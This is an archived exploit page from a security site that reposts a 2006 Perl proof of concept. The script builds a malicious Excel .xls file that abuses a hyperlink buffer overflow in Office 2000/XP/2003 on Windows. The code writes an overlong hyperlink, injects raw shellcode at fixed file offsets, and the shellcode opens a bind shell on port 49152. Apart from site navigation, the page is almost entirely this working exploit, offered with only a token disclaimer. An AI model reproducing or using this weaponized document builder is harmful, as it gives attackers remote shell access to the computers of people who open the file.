首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Excel Universal Hlink Local Buffer Overflow Exploit
来源:gforce(AT)operamail.com 作者:gforce 发布时间:2006-07-03  

#############################################################
# excel hlink overflow UNIVERSAL poc by SYS 49152 #
# public version #
# #
# works with ANY of the following oses/office combinations: #
# -windows 2k sp4/XP SP1/XP SP2 #
# #
# -office 2000/Xp/2003 #
# #
# bindshell on port 49152 #
# #
# thanks go to BuzzDee for some things.. #
# #
# credits to kcope for finding the vuln.. #
# #
# I'm always ready to join groups, boards and the like.. #
# #
# for anything about this sploit you can drop a mail to #
# #
# gforce(AT)operamail.com #
#############################################################
use Spreadsheet::WriteExcel;

my $workbook = Spreadsheet::WriteExcel->new("SYS_49152_universal_hlink.xls");
$worksheet = $workbook->add_worksheet();

$format = $workbook->add_format();
$format->set_bold();
$format->set_color('black');
$format->set_align('center');

$col=7;
$worksheet->write($row, $col, "excel overflow UNIVERSAL poc by SYS 49152 public version",$format);
$row = 2;
$worksheet->write($row, $col, "bindshell on port 49152", $format);
$row = 6 ;
$worksheet->write($row, $col, "I'm always ready to join groups, boards and the like.. but skiddiefree..", $format);
$row = 7;
$worksheet->write($row, $col, "gforce(AT)operamail.com", $format);
$row = 9;
$worksheet->write($row, $col, "thanks go to BuzzDee for some things..", $format);
$row = 11 ;
$worksheet->write($row, $col, "credits to kcope for finding the vuln..", $format);
$row = 16 ;
$worksheet->write($row, $col, "DISCLAIMER: you are NOT allowed by me to use this poc for any kind of illegal activities..", $format);


$a="aaaaaaaaa\x53\x59\x53\x34\x39\x31\x35\x32\x52\x55\x4C\x45\x5Aaaaaaaaaa\\" x 80;


my $shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49".
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d".
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66".
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61".
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40".
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32".
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6".
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09".
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0".
"\x66\x68\xc0\x00\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff".
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53".
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff".
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64".
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89".
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab".
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51".
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53".
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6".
"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0";

$worksheet->write_url(0, 0, "$a", "ClickMe!");
$workbook->close();

open(ass, "+<SYS_49152_universal_hlink.xls") || die "Can't Open temporary File\n";
seek ass,6854,0;
print ass $shellcode;
seek ass,7233,0;
print ass "\xEB\xF4\x90\x90\x13\xAC\x8D\x30";
seek ass,7223,0;
print ass "\xE9\x8A\xFE\xFF\xFF";
seek ass,6449,0;
print ass "\xEB\x1A\x90\x90\x10\x14\xB3\x30";
seek ass,6477,0;
print ass "\xEB\x7e\x90\x90\xB4\x9B\xCB\x30";
seek ass,6605,0;
print ass "\xEB\x7e";
seek ass,6733,0;
print ass "\xEB\x77";
print ".xls file written correctly.\n";
close (ass);




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Quake 3 Engine Client CS_ITEMS
·ImgSvr <= 0.6.5 (long http
·Quake 3 Engine Client CG_Serve
·WinRAR <= 3.60 beta 6 (SFX
·BXCP <= 0.3.0.4 (where) Re
·WinRAR <= 3.60 beta 6 (SFX
·Mac OS X <= 10.4.6 (launchd
·Microsoft Excel 2000/2003 Hlin
·Opera Web Browser 9.00 (iframe
·Microsoft Excel 2003 Hlink Loc
·GeekLog <= 1.4.0sr3 f(u)cke
·MS Internet Explorer 6 (Intern
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved